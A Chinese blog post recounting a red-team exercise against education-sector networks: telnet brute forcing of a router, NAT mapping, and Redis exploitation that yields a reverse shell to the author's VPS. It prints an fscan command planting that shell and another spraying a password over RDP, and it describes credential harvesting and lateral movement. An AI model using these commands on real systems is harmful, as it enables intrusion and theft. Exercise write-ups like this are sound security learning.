『攻防』記一次EDU攻防演練
背景
記一次EDU攻防,來之前還是有點慫的,因為前段時間剛打了其它地方EDU感受了一波,小部分目標有重合好難打啊(Too vegetable),不是很正式的感覺隊伍也不多,目標分下來混戰打,拿到目標表一看。
我敲了一大半的內網地址大部分都是些視頻監控系統
信息收集
拿到目標表之后就是信息收集了,挑了幾個目標fscan快速識別一波資產沒啥東西呀,web頁面有個內網地址泄露記一下,可以確定這個ip是在服務器段的,我還沒進去內網呢要這破ip干嘛
上超級弱口令檢測工具掃一波弱口令,telnet口令爆破到一個h3c設備口令,成功登陸到設備是個管理員權限,開啟web訪問看了下有ssl vpn功能和授權,那么可以直接建ssl vpn把內網打通。
菜狗不會配啊,只有抓苦力找L師傅給我看看了
白嫖L師傅干活給了個設備型號讓他去翻一波手冊,吃完飯回來L師傅很自信跟我說你的需求我清楚了不就把內網放出來嘛(簡簡單單),L師傅遠程我電腦telnet命令行配置界面敲下神秘代碼(高手高手),然后piapia打臉哈哈哈
設備太老了第一條命令就配不上,網上能找到的手冊都是命令行配置,web界面配置L師傅看了半天也沒整起,ssl vpn端口是通了但是連不上啊,吐槽了一波L師傅不靠譜,piapia打臉的L師傅試圖解釋一波(這設備出廠我都還在上初中怎么這設備還不退市啊),浪費一個小時時間沒搞出來已經晚上一點了,睡覺吧明天找c師傅幫忙看看。
第二天找c師傅看了一下也搞不上敲了這下咋辦啊,設備有telnet、ping功能,看了下設備上路由表確定了有2、3、5、6網段,telnet測試了一波網段一頭一尾的IP,根據端口開放情況確定了2網段都是些服務器、3網段沒法確定、5網段應該也是部分服務器段還有些無線ap設備。
通過telnet登陸到5網段的無線AP,可以執行部分命令,如ifconfig、ps -aux,其它命令都被屏蔽了,web界面比較簡單沒有什么功能,沒有找到相關的漏洞。
翻了下官網的產品手冊,看到一個無線網關的設備手冊里面功能有vpn功能,那如果能找到這個無線網關設備不就可以做個vpn了嗎
找了一圈沒找到無線網關,放棄了,還是想想其他辦法吧。現在我們手上有外網路由器的管理權限還有內網無線ap的權限,外網路由器可以telnet、ping探測IP和端口存活、nat端口映射。
那現在我們只有笨方法了,試試運氣去探測內網的脆弱端口如22、1433、3389、6379、7001,說干就干,之前在信息收集的時候確定了靶標IP段在2段,那么我們直接按照靶標的IP前后去探測上面的脆弱端口,如果端口開放那么我們就在路由器上做個映射到公網上面。
簡單探測了一波22端口寫好nat配置到路由器上面先爆破一下
突破口
人麻了,一個弱口令都沒有,IP繼續往前推探測6379端口,發現一個redis服務。
總算找到一個可以打的端口,這里在華三路由器telnet過去我不知道為啥我輸入info沒有返回未授權的信息,映射到外網輸入info是直接返回未授權,直接端口映射到外網直接用fscan打一下。
蕪湖,fscan創建個計劃任務彈到vps上面。
fscan_amd64.exe -h *.*.*.* -p 6379 -rs *.*.*.*:1234
等待獲取到shell
蕪湖,沖沖沖
內網橫向
拿到了內網機器權限,直接開沖,先上一波fscan撞一波之前我們收集到的密碼。
fscan_amd64.exe -h *.*.*.*/16 -pa 3389 -pwd ***** -np
運氣比較好,撞密碼撞到了兩個機器,上個向日葵rce繼續沖。
內網翻出來一堆向日葵rce,能正常執行命令的就一臺,難受了呀,powershell上線到cs上面,加賬號遠程到服務器,常規操作翻文件、瀏覽器密碼、找內網管理員IP這些。
數據庫賬號,成功連接到數據庫。
QQ文件里面有向日葵遠程碼,可惜了連接不上。
在日志里面看登陸日志確定管理員IP,探測了下管理員地址不在線,上線另外兩個rdp爆破出來的機器,瀏覽器保存了上網行為管理密碼,直接登陸到后臺了。
剛才fscan掃描出一些交換機設備,嘗試用同樣的密碼登陸,拿到了8臺交換機權限。
網絡設備分數上限2k,之前無線ap已經把分數打滿了,交了也是白交,繼續看靶標系統和虛擬化平臺,沒有一個能可以打的,剛才的設備萬能密碼也沒用。
kscan再掃描下,發現一些應該是移動終端設備,adb直接連接上去大概60臺左右算物聯網分數上限直接滿了,靶標拿不下難受啊,就這樣吧交報告溜了溜了。
總結
這次攻防整體的反思,外網打點信息收集盡量寬泛仔細一些,在現場打壓力還是大的打不出來東西就是在坐牢,和隊伍里師傅第一次協作不是很好沒有溝通好打哪個目標好點,師傅第一次打也很懵逼,我打的多之前都是旁邊輔助混子哈哈哈,信息同步還是比較重要的,內網橫向這塊還得學啊太菜了太菜了,還有就是免殺和bypass av跟師傅們學了一波姿勢,之前沒弄過上不了線真是一臉懵逼,最后差個幾千分結束了。
文章里面這個目標案例打的也不是像我寫的這么順利,在測試脆弱端口的時候人麻了,測試了有個一個多小時一個能打的都沒有,中午去吃飯路上都想著回來寫python腳本做telnet批量測試,吃飯回來坐在那擺爛隨便測了下結果測出個redis未授權才撕開了一個口子。
還有就是打的時候一定不能把自己軸進去了,一定要多跟隊伍里師傅溝通想法怎么做,多個人多種思路,一個點上浪費了太多時間一定要及時調整尋找其它突破點,這個在突破到內網那里我就很軸,當時我就想把ssl vpn建立起來但是就是建立不起來,c師傅喊我換個思路把端口映射出來打,最后想想確實在ssl vpn那塊浪費太多時間,一定及時調整自己思路。
